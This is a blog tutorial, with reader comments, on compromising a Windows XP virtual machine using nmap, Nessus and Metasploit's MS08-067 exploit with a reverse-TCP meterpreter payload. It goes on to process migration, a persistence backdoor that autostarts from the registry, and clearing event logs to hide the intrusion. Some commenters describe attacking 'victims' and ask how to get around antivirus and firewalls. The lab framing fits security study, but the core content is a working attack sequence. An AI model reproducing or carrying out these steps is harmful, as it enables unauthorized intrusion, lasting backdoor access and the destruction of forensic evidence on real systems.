Holla Guys,
Lets do some exploitation. :D
1. Startup your XP in Virtualbox
(for those who haven't installed xp in virtualbox can see the tutorial here
2. Make sure that the host(BT 5r1) and the XP are connected each other.
# nmap -A 192.168.56.101
Spoiler:
(for how to use nessus you can go here)
After the scan finished, lets analyze the report.
Great, it says that our target smb service is vulnerable and its vulnerability level is high too.
pay attention to this
because we have to use it to search for the right exploit. or simply look at there.
That plugin name is the hint to search for the right exploit.
4. Lets search the exploit to attack that vulnerability on metasploit. Start your metasploit console.
# msfconsoleTo search for exploit type
meterpreter > search platform:windows type:exploit cve:-2008-4834 app:server path:exploit/windows/smbexplanation : for the search sytax type "search -h"
platform : because the target is a windows system we choose this.
type : because we only want to search an exploit, we choose exploit for this.
cve : fill with the data from nessus scan.
app : server attack side.
path : because we want to search only exploits for smb set the path to this is right.
Hit, enter.
Notice that there is this exploit there, "ms08_067_netapi" that located at exploit/windows/smb/ms08_067_netapi. The one that have the same name as the plugin name that we've discovered with the nessus earlier. Important to know that almost all windows is vulnurable with this exploit. Lets use it.
5. Type these :
use exploit/windows/smb/ms08_067_netapiexplanation : by typing this we set the metasploit to use this exploit on the target.
set RHOST 192.168.56.101explanation : RHOST is the target, set the ip with the target that you want to attack.
set PAYLOAD windows/meterpreter/reverse_tcpexplanation : meterpreter is the payload that we want to use. I'll explain more about payload later.
set LHOST 192.168.56.1explanation : LHOST is the Listener HOST. this is us. set with our IP.
exploitlaunch the attack.
6.If everything is done correctly, a meterpreter shell will appear on the target system.
7. From this point, the server is under our control. But to prevent the user kill our meterpreter process we must quickly migrate to the other services running.
To show the running process on the target system type
meterpreter > pssearch for explorer.exe process since it is the most important services on windows and identify the process number. Lets migrate to that service.
meterpreter > migrate [PID]You can do whatever you want on the system now.
8. Ok, next step is placing a backdoor for later connection. Good for us metasploit also provided the script for it called "persistence". Lets see the usage of this script.
meterpreter > run persistence -h
Lets execute it.
meterpreter > run persistence -A -X -p 10000 -r 192.168.56.1And thats it. A backdoor have been created on the target system.
(the backdoor will be located at C:\WINDOWS\TEMP directory. It is a .vbs file. The scirpt will also create an autostart in the registry key HKLM\Software\Microsoft\CurrentVersion\Run\XXXXX(random). So, when the pc start, the backdoor will also active. For tutorial to use the backdoor you can go here)
9. And don't forget to clear our hacking tracks.
meterpreter > clearevTo exit the shell just type "exit".
The elaboration from this attack based on the hacking methodology is
1. Information Gathering
Using nmap get the information.
2. Service Enumeration
Using nmap to see the services running.
3. Vulnerability Assessment
Using nessus to scan the vulnerability and metasploit to search the exploit.
4. Exploit
Using metasploit on console mode to take over the system.
5. Backdooring
Using metaspoit 'persistance' script to create backdoor.
6. Housekeeping
Using metasploit 'crearev' to clear the tracks.
Hope this helps. :)
Lets make the History!!
15 comments:
Cool!!! Don't forget to teach me about how to do that.
haha, lol.. you're more expert than me..
I am the one that needs your teaching.. :D
its not working on firewall and updated windows
yep, no doubt about that.. :)
Metasploit network security software,Thanks for sharing such an informative article.
Download Metasploit network security software
hi i've exploited some machines follwing your method. But now my victim has Kaspersky internet security installed on it and every time it revert back with the error like,
"Connection reset by peers"
pls help me on this.
> Hardip Gajjar :
hmm... i think the main problem is that kaspersky here..
Wow It works
It was not working, if the system is protected by the firewall.
Thanks It Worked I Tested In My VM Windows XP SP2 With Firewall off..
i've got a xp sp3 machine with no updates installed and the meterpreter shell doesnt work.
Exploit completed, but no session was created.
any tips?
I've also got an XP SP3 machine with no updates and the meterpreter shell won't load based on the same error that @Josh had:
"Exploit completed, but no session was created."
Any thoughts on what to check or try? I have a virtual lab on my laptop and I'm able to run successful exploits against Linux VMs and also Metasploitable 2.
hi how do you shut down metasploitable and boot up windows xp?
how to port forward with NAT mode in vmeare Workstation 14 Player
vmnernat.conf file is missing
vmeare. Run on window 7 .Plz help
We will be getting a reverse TCP connection from the victim machine by using a small backdoor using metasploit on windows.
Post a Comment